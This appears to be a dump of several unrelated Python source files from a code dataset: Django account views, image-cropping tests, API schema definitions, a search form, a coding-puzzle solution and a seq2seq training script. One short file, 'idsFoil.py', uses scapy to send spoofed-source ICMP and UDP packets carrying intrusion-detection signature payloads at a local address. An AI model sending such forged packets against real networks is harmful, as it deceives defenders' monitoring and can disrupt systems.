render_to_string('account_activation_email.html', {\r\n 'user': user,\r\n 'domain': current_site.domain,\r\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\r\n 'token': account_activation_token.make_token(user),\r\n })\r\n user.email_user(subject, message)\r\n return redirect('account_activation_sent')\r\n else:\r\n form = SignUpForm()\r\n return render(request, 'eventapp/signup.html', {'form': form})\r\n\r\n\r\ndef activate(request, uidb64, token):\r\n try:\r\n uid = force_text(urlsafe_base64_decode(uidb64))\r\n user = User.objects.get(pk=uid)\r\n except (TypeError, ValueError, OverflowError, User.DoesNotExist):\r\n user = None\r\n\r\n if user is not None and account_activation_token.check_token(user, token):\r\n user.is_active = True\r\n user.profile.email_confirmed = True\r\n user.save()\r\n login(request, user)\r\n return redirect('home')\r\n else:\r\n return render(request, 'account_activation_invalid.html')\r\n\r\n\r\n\r\n","sub_path":"eventapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"58227011","text":"# coding: utf8\nimport PIL.Image\nimport pkg_resources\nimport unittest\nimport zeit.cms.testing\nimport zeit.content.image.testing\nimport zeit.imp.interfaces\nimport zeit.imp.mask\nimport zeit.imp.source\nimport zope.interface.verify\n\n\nproduct_config = \"\"\"\n\n scale-source file://{base}/scales.xml\n color-source file://{base}/colors.xml\n \n\"\"\".format(base=pkg_resources.resource_filename(__name__, ''))\n\n\nCONFIG_LAYER = zeit.cms.testing.ProductConfigLayer(\n product_config, bases=(zeit.content.image.testing.CONFIG_LAYER,))\nZCML_LAYER = zeit.cms.testing.ZCMLLayer(bases=(CONFIG_LAYER,))\nZOPE_LAYER = zeit.cms.testing.ZopeLayer(bases=(ZCML_LAYER,))\nWSGI_LAYER = zeit.cms.testing.WSGILayer(bases=(ZOPE_LAYER,))\n\n\nclass BrowserTestCase(zeit.cms.testing.BrowserTestCase):\n\n layer = WSGI_LAYER\n\n\nclass TestLayerMask(unittest.TestCase):\n\n mask_colors = {(200, 200, 200, 220): 'x',\n (255, 0, 0, 0): ' ',\n (0, 0, 0, 255): '#',\n (0, 255, 0, 128): ' '}\n\n def assert_mask(self, expected, mask):\n mask_image = PIL.Image.open(mask.open('r'))\n width, height = mask_image.size\n got = []\n for y in range(height):\n line = []\n for x in range(width):\n line.append(self.mask_colors[mask_image.getpixel((x, y))])\n got.append(''.join(line))\n error_message = (\n 'The computed mask did not match the expected.\\n'\n 'Expected:\\n%s\\n\\nGot:\\n%s' % ('\\n'.join(expected),\n '\\n'.join(got)))\n self.assertEqual(expected, got, error_message)\n\n def test_mask_should_have_correct_size(self):\n # Create a 20x30 mask in an 150x100 image\n mask = zeit.imp.mask.Mask((10, 7), (6, 3), cross_size=0)\n expected = ['xxxxxxxxxx',\n 'xxxxxxxxxx',\n 'xx xx',\n 'xx xx',\n 'xx xx',\n 'xxxxxxxxxx',\n 'xxxxxxxxxx']\n self.assert_mask(expected, mask)\n\n def test_border_should_be_inside_given_mask_size(self):\n mask = zeit.imp.mask.Mask((20, 20), (10, 8), border=(0, 0, 0),\n cross_size=0)\n expected = ['xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxx##########xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx# #xxxxx',\n 'xxxxx##########xxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx',\n 'xxxxxxxxxxxxxxxxxxxx']\n self.assert_mask(expected, mask)\n\n def test_given_border_colour_should_be_used(self):\n mask = zeit.imp.mask.Mask((100, 100), (100, 100), border=(255, 0, 0))\n image = PIL.Image.open(mask.open('r'))\n self.assertEqual((255, 0, 0, 255), image.getpixel((0, 0)))\n\n def test_rect_box_should_match_given_mask_size(self):\n mask = zeit.imp.mask.Mask((150, 100), (20, 30))\n (x1, y1), (x2, y2) = mask._get_rect_box()\n # There is a rather missleading comment in the PIL documentation which\n # indicates that we need to pass 1px less than the expected size:\n # \"Note that the second coordinate pair defines a point just outside\n # the rectangle, also when the rectangle is not filled.\"\n self.assertEqual(19, x2 - x1)\n self.assertEqual(29, y2 - y1)\n\n\nclass TestSources(zeit.cms.testing.FunctionalTestCase):\n\n layer = ZOPE_LAYER\n\n def test_scale_source(self):\n source = zeit.imp.source.ScaleSource()(None)\n scales = list(source)\n self.assertEqual(7, len(scales))\n scale = scales[0]\n zope.interface.verify.verifyObject(\n zeit.imp.interfaces.IPossibleScale, scale)\n self.assertEqual('450x200', scale.name)\n self.assertEqual('450', scale.width)\n self.assertEqual('200', scale.height)\n self.assertEqual(u'Aufmacher groß (450×200)', scale.title)\n\n def test_color_source(self):\n source = zeit.imp.source.ColorSource()(None)\n values = list(source)\n self.assertEqual(3, len(values))\n value = values[1]\n zope.interface.verify.verifyObject(zeit.imp.interfaces.IColor, value)\n self.assertEqual('schwarzer Rahmen (1 Pixel)', value.title)\n self.assertEqual('#000000', value.color)\n\n\nclass TestCrop(zeit.cms.testing.FunctionalTestCase):\n\n layer = ZOPE_LAYER\n\n def setUp(self):\n super(TestCrop, self).setUp()\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image())\n self.crop = zeit.imp.interfaces.ICropper(self.group)\n\n def get_histogram(self, image):\n histogram = image.histogram()\n r, g, b = histogram[:256], histogram[256:512], histogram[512:]\n return r, g, b\n\n def test_invalid_filter_raises_valueerror(self):\n self.assertRaises(ValueError, self.crop.add_filter, 'foo', 1)\n\n def test_brightness_filter(self):\n # Factor 0 produces a solid black image. The histogram has only black\n # in it\n self.crop.add_filter('brightness', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200)\n r, g, b = self.get_histogram(image)\n self.assertEqual(40000, r[0])\n self.assertEqual(40000, g[0])\n self.assertEqual(40000, b[0])\n self.assertEqual(0, sum(r[1:]))\n self.assertEqual(0, sum(g[1:]))\n self.assertEqual(0, sum(b[1:]))\n\n def test_color_filter(self):\n # Factor 0 gives a black and white image, so the channels are equal\n self.crop.add_filter('color', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200)\n r, g, b = self.get_histogram(image)\n self.assertEqual(r, g)\n self.assertEqual(r, b)\n\n def test_contrast_filter(self):\n # A contrast factor of 0 produces a solid gray image:\n self.crop.add_filter('contrast', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200)\n r, g, b = self.get_histogram(image)\n self.assertEqual(40000, sum(r))\n self.assertEqual(40000, sum(g))\n self.assertEqual(40000, sum(b))\n self.assertEqual(40000, r[99])\n self.assertEqual(40000, g[99])\n self.assertEqual(40000, b[99])\n\n def test_sharpness_filter(self):\n # Testing the sharpnes is not quite trival. We just check that the\n # histograms have changed:\n self.crop.add_filter('sharpness', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200)\n r_smooth, g, b = self.get_histogram(image)\n\n # Create the sharp image now\n self.crop.filters[:] = []\n self.crop.add_filter('sharpness', 1000)\n image = self.crop.crop(200, 200, 0, 0, 200, 200)\n r_sharp, g, b = self.get_histogram(image)\n self.assertNotEqual(r_smooth, r_sharp)\n\n def test_store(self):\n self.crop.crop(200, 200, 0, 0, 200, 200)\n image = zeit.imp.interfaces.IStorer(self.group).store(\n 'foo', self.crop.pil_image)\n self.assertTrue(zeit.content.image.interfaces.IImage.providedBy(image))\n self.assertIn('group-foo.jpg', self.group)\n\n def test_border_applied_after_filters(self):\n # The border must be applied after the filters. To verify this we\n # create an image with no contrast which is solid gray. The border adds\n # some black.\n self.crop.add_filter('contrast', 0)\n image = self.crop.crop(200, 200, 0, 0, 200, 200, border=(0, 0, 0))\n r, g, b = self.get_histogram(image)\n self.assertNotEqual(40000, r[156])\n self.assertNotEqual(40000, g[156])\n self.assertNotEqual(40000, b[156])\n self.assertNotEqual(0, r[0])\n self.assertNotEqual(0, g[0])\n self.assertNotEqual(0, b[0])\n\n def test_border_color(self):\n image = self.crop.crop(200, 200, 0, 0, 200, 200,\n border=(127, 127, 127))\n self.assertEqual((127, 127, 127), image.getpixel((0, 0)))\n\n def test_border_on_grayscale_image(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/grayscale.jpg')))\n # The following used to fail with TypeError: an integer is required\n crop = zeit.imp.interfaces.ICropper(self.group)\n crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n\n def test_cmyk_converted_to_rgb(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/cmyk.jpg')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGB', image.mode)\n\n def test_palette_converted_to_rgb(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/palette.gif')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGB', image.mode)\n\n def test_png_converted_to_rgba(self):\n self.group = (\n zeit.content.image.testing.create_image_group_with_master_image(\n pkg_resources.resource_filename(\n __name__, 'testdata/transparent.png')))\n crop = zeit.imp.interfaces.ICropper(self.group)\n image = crop.crop(200, 200, 0, 0, 200, 200, border=(127, 127, 127))\n self.assertEqual('RGBA', image.mode)\n # Check that the alpha channel survives the cropping intact.\n self.assertEqual((183, 255, 159, 64), image.getpixel((100, 25)))\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestLayerMask))\n suite.addTest(unittest.makeSuite(TestSources))\n suite.addTest(unittest.makeSuite(TestCrop))\n return suite\n","sub_path":"core/src/zeit/imp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"231124555","text":"import re\nimport http\nimport functools\n\nimport marshmallow as ma\nfrom smore import swagger\nfrom marshmallow_sqlalchemy import ModelSchema\n\nfrom webservices import utils\nfrom webservices import paging\nfrom webservices.spec import spec\nfrom webservices.common import models\nfrom webservices import __API_VERSION__\n\n\ndef _get_class(value):\n return value if isinstance(value, type) else type(value)\n\n\ndef _format_ref(ref):\n return {'$ref': '#/definitions/{0}'.format(ref)}\n\n\ndef _schema_or_ref(schema):\n schema_class = _get_class(schema)\n ref = next(\n (\n ref_name\n for ref_schema, ref_name in spec.plugins['smore.ext.marshmallow']['refs'].items()\n if schema_class is _get_class(ref_schema)\n ),\n None,\n )\n return _format_ref(ref) if ref else swagger.schema2jsonschema(schema)\n\n\ndef marshal_with(schema, code=http.client.OK, description=None, wrap=True):\n def wrapper(func):\n func.__apidoc__ = getattr(func, '__apidoc__', {})\n func.__apidoc__.setdefault('responses', {}).update({\n code: {\n 'schema': _schema_or_ref(schema),\n 'description': description or '',\n }\n })\n\n if wrap:\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n return schema.dump(func(*args, **kwargs)).data\n return wrapped\n return func\n\n return wrapper\n\n\ndef register_schema(schema, definition_name=None):\n definition_name = definition_name or re.sub(r'Schema$', '', schema.__name__)\n spec.definition(definition_name, schema=schema())\n\n\ndef make_schema(model, class_name=None, fields=None, options=None):\n class_name = class_name or '{0}Schema'.format(model.__name__)\n\n Meta = type(\n 'Meta',\n (object, ),\n utils.extend(\n {\n 'model': model,\n 'sqla_session': models.db.session,\n 'exclude': ('idx', ),\n },\n options or {},\n )\n )\n\n return type(\n class_name,\n (ModelSchema, ),\n utils.extend({'Meta': Meta}, fields or {}),\n )\n\n\ndef make_page_schema(schema, page_type=paging.OffsetPageSchema, class_name=None,\n definition_name=None):\n class_name = class_name or '{0}PageSchema'.format(re.sub(r'Schema$', '', schema.__name__))\n definition_name = definition_name or re.sub(r'Schema$', '', schema.__name__)\n\n class Meta:\n results_schema_class = schema\n results_schema_options = {'ref': '#/definitions/{0}'.format(definition_name)}\n\n return type(\n class_name,\n (page_type, ApiSchema),\n {'Meta': Meta},\n )\n\n\nclass ApiSchema(ma.Schema):\n def _postprocess(self, data, many, obj):\n ret = {'api_version': __API_VERSION__}\n ret.update(data)\n return ret\n\n\nclass BaseSearchSchema(ma.Schema):\n id = ma.fields.Str()\n name = ma.fields.Str()\n\n\nclass CandidateSearchSchema(BaseSearchSchema):\n office_sought = ma.fields.Str()\n\n\nclass CommitteeSearchSchema(BaseSearchSchema):\n pass\n\n\nclass CandidateSearchListSchema(ApiSchema):\n results = ma.fields.Nested(\n CandidateSearchSchema,\n ref='#/definitions/CandidateSearch',\n many=True,\n )\n\n\nclass CommitteeSearchListSchema(ApiSchema):\n results = ma.fields.Nested(\n CandidateSearchSchema,\n ref='#/definitions/CommitteeSearch',\n many=True,\n )\n\n\nregister_schema(CandidateSearchSchema)\nregister_schema(CandidateSearchListSchema)\nregister_schema(CommitteeSearchSchema)\nregister_schema(CommitteeSearchListSchema)\n\n\nmake_committee_schema = functools.partial(make_schema, options={'exclude': ('idx', 'committee_key')})\nCommitteeSchema = make_committee_schema(models.Committee)\nCommitteeHistorySchema = make_committee_schema(models.CommitteeHistory)\nCommitteeDetailSchema = make_committee_schema(models.CommitteeDetail)\n\nCommitteePageSchema = make_page_schema(CommitteeSchema)\nCommitteeHistoryPageSchema = make_page_schema(CommitteeHistorySchema)\nCommitteeDetailPageSchema = make_page_schema(CommitteeDetailSchema)\n\nregister_schema(CommitteeSchema)\nregister_schema(CommitteeHistorySchema)\nregister_schema(CommitteeDetailSchema)\nregister_schema(CommitteePageSchema)\nregister_schema(CommitteeHistoryPageSchema)\nregister_schema(CommitteeDetailPageSchema)\n\n\nmake_candidate_schema = functools.partial(make_schema, options={'exclude': ('idx', 'candidate_key')})\nCandidateSchema = make_schema(\n models.Candidate,\n options={'exclude': ('idx', 'candidate_key', 'principal_committees')},\n)\nCandidateSearchSchema = make_candidate_schema(\n models.Candidate,\n fields={'principal_committees': ma.fields.Nested(CommitteeSchema, many=True)},\n)\nCandidateDetailSchema = make_candidate_schema(models.CandidateDetail)\nCandidateHistorySchema = make_candidate_schema(models.CandidateHistory)\n\nCandidatePageSchema = make_page_schema(CandidateSchema)\nCandidateDetailPageSchema = make_page_schema(CandidateDetailSchema)\nCandidateSearchPageSchema = make_page_schema(CandidateSearchSchema)\nCandidateHistoryPageSchema = make_page_schema(CandidateHistorySchema)\n\nregister_schema(CandidateSchema)\nregister_schema(CandidateDetailSchema)\nregister_schema(CandidateSearchSchema)\nregister_schema(CandidateHistorySchema)\n\nregister_schema(CandidatePageSchema)\nregister_schema(CandidateSearchPageSchema)\nregister_schema(CandidateDetailPageSchema)\nregister_schema(CandidateHistoryPageSchema)\n\n\nmake_reports_schema = functools.partial(\n make_schema,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'report_form': ma.fields.Str(),\n 'committee_type': ma.fields.Str(attribute='committee.committee_type'),\n },\n options={'exclude': ('idx', 'report_key', 'committee')},\n)\n\nCommitteeReportsPresidentialSchema = make_reports_schema(models.CommitteeReportsPresidential)\nCommitteeReportsHouseSenateSchema = make_reports_schema(models.CommitteeReportsHouseSenate)\nCommitteeReportsPacPartySchema = make_reports_schema(models.CommitteeReportsPacParty)\nCommitteeReportsIEOnlySchema = make_reports_schema(models.CommitteeReportsIEOnly)\n\nCommitteeReportsPresidentialPageSchema = make_page_schema(CommitteeReportsPresidentialSchema)\nCommitteeReportsHouseSenatePageSchema = make_page_schema(CommitteeReportsHouseSenateSchema)\nCommitteeReportsPacPartyPageSchema = make_page_schema(CommitteeReportsPacPartySchema)\nCommitteeReportsIEOnlyPageSchema = make_page_schema(CommitteeReportsIEOnlySchema)\n\nreports_schemas = (\n CommitteeReportsPresidentialSchema,\n CommitteeReportsHouseSenateSchema,\n CommitteeReportsPacPartySchema,\n CommitteeReportsIEOnlySchema,\n)\nCommitteeReportsSchema = type('CommitteeReportsSchema', reports_schemas, {})\nCommitteeReportsPageSchema = make_page_schema(CommitteeReportsSchema)\n\nregister_schema(CommitteeReportsSchema)\nregister_schema(CommitteeReportsPageSchema)\n\nCommitteeTotalsPresidentialSchema = make_schema(models.CommitteeTotalsPresidential)\nCommitteeTotalsHouseSenateSchema = make_schema(models.CommitteeTotalsHouseSenate)\nCommitteeTotalsPacPartySchema = make_schema(models.CommitteeTotalsPacParty)\nCommitteeTotalsIEOnlySchema = make_schema(models.CommitteeTotalsIEOnly)\n\nCommitteeTotalsPresidentialPageSchema = make_page_schema(CommitteeTotalsPresidentialSchema)\nCommitteeTotalsHouseSenatePageSchema = make_page_schema(CommitteeTotalsHouseSenateSchema)\nCommitteeTotalsPacPartyPageSchema = make_page_schema(CommitteeTotalsPacPartySchema)\nCommitteeTotalsIEOnlyPageSchema = make_page_schema(CommitteeTotalsIEOnlySchema)\n\ntotals_schemas = (\n CommitteeTotalsPresidentialSchema,\n CommitteeTotalsHouseSenateSchema,\n CommitteeTotalsPacPartySchema,\n CommitteeTotalsIEOnlySchema,\n)\nCommitteeTotalsSchema = type('CommitteeTotalsSchema', totals_schemas, {})\nCommitteeTotalsPageSchema = make_page_schema(CommitteeTotalsSchema)\n\nregister_schema(CommitteeTotalsSchema)\nregister_schema(CommitteeTotalsPageSchema)\n\n\nScheduleASchema = make_schema(\n models.ScheduleA,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'memoed_subtotal': ma.fields.Boolean(),\n 'committee': ma.fields.Nested(CommitteeHistorySchema),\n 'contributor': ma.fields.Nested(CommitteeHistorySchema),\n 'contributor_receipt_amount': ma.fields.Decimal(places=2),\n 'contributor_aggregate_ytd': ma.fields.Decimal(places=2),\n },\n options={\n 'exclude': ('memo_code', ),\n }\n)\nScheduleAPageSchema = make_page_schema(ScheduleASchema, page_type=paging.SeekPageSchema)\nregister_schema(ScheduleASchema)\nregister_schema(ScheduleAPageSchema)\n\nmake_aggregate_schema = functools.partial(\n make_schema,\n fields={\n 'total': ma.fields.Decimal(places=2),\n }\n)\nScheduleABySizeSchema = make_aggregate_schema(models.ScheduleABySize)\nScheduleAByStateSchema = make_aggregate_schema(models.ScheduleAByState)\nScheduleAByZipSchema = make_aggregate_schema(models.ScheduleAByZip)\n\nScheduleABySizePageSchema = make_page_schema(ScheduleABySizeSchema)\nScheduleAByStatePageSchema = make_page_schema(ScheduleAByStateSchema)\nScheduleAByZipPageSchema = make_page_schema(ScheduleAByZipSchema)\n\nregister_schema(ScheduleABySizeSchema)\nregister_schema(ScheduleAByStateSchema)\nregister_schema(ScheduleAByZipSchema)\nregister_schema(ScheduleABySizePageSchema)\nregister_schema(ScheduleAByStatePageSchema)\nregister_schema(ScheduleAByZipPageSchema)\n\n\nScheduleBSchema = make_schema(\n models.ScheduleB,\n fields={\n 'pdf_url': ma.fields.Str(),\n 'memoed_subtotal': ma.fields.Boolean(),\n 'committee': ma.fields.Nested(CommitteeHistorySchema),\n 'recipient_committee': ma.fields.Nested(CommitteeHistorySchema),\n 'disbursement_amount': ma.fields.Decimal(places=2),\n 'semi_annual_bundled_refund': ma.fields.Decimal(places=2),\n },\n options={\n 'exclude': ('memo_code', ),\n }\n)\nScheduleBPageSchema = make_page_schema(ScheduleBSchema, page_type=paging.SeekPageSchema)\nregister_schema(ScheduleBSchema)\nregister_schema(ScheduleBPageSchema)\n\n\nFilingsSchema = make_schema(\n models.Filings,\n fields={\n 'pdf_url': ma.fields.Str(),\n },\n)\nFilingsPageSchema = make_page_schema(FilingsSchema)\nregister_schema(FilingsSchema)\nregister_schema(FilingsPageSchema)\n","sub_path":"webservices/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"212379036","text":"# coding: utf-8\n\nfrom django import forms\nfrom interface.models import Region, Cuerpo, MaterialMayor\n\nclass MaterialMayorSearchForm(forms.Form):\n region = forms.ModelChoiceField(queryset=Region.objects.all(), required=False, empty_label='Nivel JNBC')\n cuerpo = forms.ModelChoiceField(queryset=Cuerpo.objects.order_by('nombre'), required=False,\n empty_label='Ver todos')\n incluir_dados_de_baja = forms.BooleanField(required=False)\n \n def get_filtered_material_mayor(self):\n self.full_clean()\n \n data = self.data\n\n material_mayor = MaterialMayor.objects.filter(validado_por_operaciones=True)\n\n if not 'incluir_dados_de_baja' in data or not data['incluir_dados_de_baja']:\n material_mayor = MaterialMayor.objects.filter(dada_de_baja__isnull=True)\n \n if 'region' in data and data['region'] and int(data['region']):\n material_mayor = material_mayor.filter(cuerpo__comuna__provincia__region__id=data['region'])\n else:\n material_mayor = material_mayor.filter(cuerpo__isnull=True)\n \n if 'cuerpo' in data and data['cuerpo'] and int(data['cuerpo']):\n material_mayor = material_mayor.filter(cuerpo__id=data['cuerpo'])\n\n \n return material_mayor\n \n def get_path(self):\n result = []\n \n d = self.data\n \n if 'region' in d and d['region'] and int(d['region']):\n result.append('region=%d' % int(d['region']))\n if 'cuerpo' in d and d['cuerpo'] and int(d['cuerpo']):\n result.append('cuerpo=%d' % int(d['cuerpo']))\n \n return '&'.join(result)\n","sub_path":"interface/forms/material_mayor_search_form.py","file_name":"material_mayor_search_form.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181917638","text":"from scapy.all import *\r\ndef ddosTest(src,dst,iface,count):\r\n pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/RAW(load='1234')\r\n send(pkt,iface=iface,count=count)\r\n pkt=IP(src=src,dst=dst)/ICMP(type=0)/RAW(load='AAAAAAAAA')\r\n send(pkt,iface=iface,count=count)\r\n pkt=IP(src=src,dst=dst)/UDP(dport=31335)/RAW(load='PONG')\r\n send(pkt,iface=iface,count=count)\r\n pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)\r\n send(pkt,iface=iface,count=count)\r\nsrc=\"1.3.3.7\"\r\ndst=\"192.168.1.106\"\r\niface=\"eth0\"\r\ncount=1\r\nddosTest(src,dst,iface,count)\r\n","sub_path":"idsFoil.py","file_name":"idsFoil.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"480492449","text":"\nclass Solution:\n def __init__(self):\n self.dic = dict()\n \n def canJump(self, nums: 'List[int]') -> bool:\n if len(nums) == 1:\n return True\n \n self.dic[0] = nums[0]\n for i in range(1, len(nums)):\n if self.dic[i-1] < i:\n return False\n \n self.dic[i] = max(self.dic[i-1], i + nums[i])\n \n return self.dic[len(nums)-1] >= len(nums) - 1\n \n\nsol = Solution()\nsol.canJump([2,3,1,1,4])\n\n","sub_path":"leetcode/Medium/JumpGame/JumpGame.py","file_name":"JumpGame.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"571045022","text":"import seq2seq_weak\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch import optim\nimport pickle, time\nimport torch\nfrom language import Lang\nimport random\nfrom torch.nn.utils.rnn import pack_padded_sequence as pack\nfrom torch.nn.utils.rnn import pad_packed_sequence as unpack\n\nuse_cuda = torch.cuda.is_available()\nMAX_LENGTH = 20\n\nclass Decoder(nn.Module):\n def __init__(self, args, voc_size, emb_size, hidden_size, bidirectional=False):\n super(Decoder, self).__init__()\n self.hidden_size = hidden_size\n self.emb_size = emb_size\n self.voc_size = voc_size\n if bidirectional:\n self.out = nn.Linear(self.hidden_size*2, self.voc_size)\n else:\n self.out = nn.Linear(self.hidden_size, self.voc_size)\n\n def forward(self, hidden):\n pred_word = self.out(hidden)\n return pred_word\n\n\nclass Encoder(nn.Module):\n def __init__(self, voc_size, emb_size, hidden_size, n_layers=1, bidirectional=False):\n super(Encoder, self).__init__()\n self.n_layers = n_layers\n self.hidden_size = hidden_size\n self.emb_size = emb_size\n self.bidirectional = bidirectional\n \n self.embedding = nn.Embedding(voc_size, emb_size, padding_idx=0)\n self.gru = nn.GRU(emb_size, hidden_size, num_layers=self.n_layers, batch_first=False,\n bidirectional=self.bidirectional)\n \n def load_emb(self, emb):\n emb = torch.from_numpy(np.array(emb, dtype=np.float32))\n self.embedding.weight.data.copy_(emb)\n \n def forward(self, input):\n '''\n input :: sl, bs\n\n return\n output :: sl, bs, nh*directions\n hidden :: n_layers*directions,bs, nh\n '''\n batch_size = input.size()[0]\n init_state = self.initHidden(batch_size)\n output, state = self.encode(input, init_state)\n return output, state\n \n def encode(self, input, hidden):\n '''\n input :: bs, sl\n\n return\n output :: bs, sl, nh*directions\n hidden :: n_layers*directions,bs, nh\n '''\n mask = torch.gt(input.data, 0)\n input_length = torch.sum((mask.long()), dim=1) # batch first = True, (batch, sl)\n lengths, indices = torch.sort(input_length, dim=0, descending=True)\n _, ind = torch.sort(indices, dim=0)\n input_length = torch.unbind(lengths, dim=0)\n embedded = self.embedding(torch.index_select(input, dim=0, index=Variable(indices)))\n output, hidden = self.gru(pack(embedded, input_length, batch_first=True), hidden)\n output = torch.index_select(unpack(output, batch_first=True)[0], dim=0, index=Variable(ind)) * Variable(\n torch.unsqueeze(mask.float(), -1))\n hidden = torch.unbind(hidden, dim=0)\n hidden = torch.cat(hidden, 1)\n hidden = torch.index_select(hidden, dim=0, index=Variable(ind))\n direction = 2 if self.bidirectional else 1\n assert hidden.size() == (input.size()[0], self.hidden_size*direction) and output.size() == (\n input.size()[0], input.size()[1], self.hidden_size * direction)\n return output, hidden\n \n def initHidden(self, batch_size):\n bid = 2 if self.bidirectional else 1\n result = Variable(torch.zeros(self.n_layers * bid, batch_size, self.hidden_size))\n if use_cuda:\n return result.cuda()\n return result\n\ndef target_padding(targets,length,pad_token=-1):\n result = [list() for i in range(len(targets))]\n for i in range(len(targets)):\n for j in range(len(targets[i])):\n if targets[i][j] < 1:\n break\n result[i].append(targets[i][j])\n while len(result[i]) < length:\n result[i].append(pad_token)\n return result\n\ndef multi_loss(logits, targets):\n '''\n logits :: bs, nv\n targets:: nclass, bs\n '''\n loss_func = torch.nn.MultiLabelMarginLoss()\n '''\n p = Variable(multi_hot(targets.data,logits.size()[1])) # bs, nv\n if use_cuda:\n p = p.cuda()\n '''\n loss = loss_func(input=F.sigmoid(logits),target=targets)\n return loss\n\ndef train(args, inputs, targets, encoder, decoder, optimizer, tgt_lang):\n optimizer.zero_grad()\n input_length = inputs.size()[1]\n target_length = targets.size()[1]\n batch_size = inputs.size()[0]\n loss = 0.\n\n # encoding part\n encoder_output, encoder_state = encoder(inputs)\n\n # decoding part\n pred_words = decoder(encoder_state) # bs, nv\n loss = multi_loss(pred_words, targets)\n loss.backward()\n optimizer.step()\n\n return loss.data\n\ndef evaluate(args, encoder, decoder, sentence, src_lang, tgt_lang, from_text=False, max_length=MAX_LENGTH):\n input_variable = seq2seq_weak.variable_from_sentence(src_lang,sentence, from_text)\n input_variable = torch.unsqueeze(input_variable, 0)\n input_length = input_variable.size()[1]\n encoder_output, encoder_state = encoder(input_variable)\n\n decoded_words = F.sigmoid(decoder(encoder_state))\n decoded_words = torch.squeeze(decoded_words)\n topv,topi = decoded_words.topk(max_length)\n results = []\n for v,i in zip(topv,topi):\n if v.data[0] > args.threshold:\n results.append(tgt_lang.id2word[i.data[0]])\n return results\n \ndef evaluate_all(args, data, encoder, decoder, src_lang, tgt_lang, from_text):\n hypothsis = []\n reference = []\n for s,t in tqdm(data, disable=not args.verbose):\n result = evaluate(args, encoder, decoder, list(s), src_lang=src_lang,tgt_lang=tgt_lang, from_text=from_text)\n hypothsis.append(result)\n if not from_text:\n reference.append([tgt_lang.id2word[word] for word in t])\n else:\n reference.append(t)\n precision, recall, F = seq2seq_weak.eval_F(reference, hypothsis, log_path='./log/'+args.log_dir)\n return precision, recall, F\n\ndef train_iters(args,encoder, decoder, train_data, dev_data, test_data, test_data_text, n_iters, src_lang, tgt_lang, print_every=1000, plot_every=1000):\n start_time = time.time()\n parameters = [p for p in encoder.parameters()] + [p for p in decoder.parameters()]\n optimizer = optim.Adam(parameters)\n\n best_epoch = 0\n best_F = -1.\n for iter in range(1, n_iters+1):\n total_loss = 0.\n if args.debug:\n train_data = train_data[:2]\n for batch in tqdm(train_data, disable=not args.verbose):\n src, tgt = batch\n tgt = target_padding(tgt,len(tgt_lang.word2id))\n src = np.array([np.array(s, dtype=np.long) for s in src], dtype=np.long)\n tgt = np.array([np.array(s, dtype=np.long) for s in tgt], dtype=np.long)\n input_variable = Variable(torch.from_numpy(src))\n target_variable = Variable(torch.from_numpy(tgt))\n if use_cuda:\n input_variable = input_variable.cuda()\n target_variable = target_variable.cuda()\n loss = train(args, input_variable, target_variable, encoder, decoder, optimizer, tgt_lang)\n total_loss += loss\n print('epoch %d, total loss %.2f'%(iter,total_loss.cpu()[0]))\n precision, recall ,F = evaluate_all(args, dev_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n print('Precision %.3f, recall %.3f, F %.3f'%(precision*100, recall*100, F*100))\n sys.stdout.flush()\n \n if best_F < F:\n 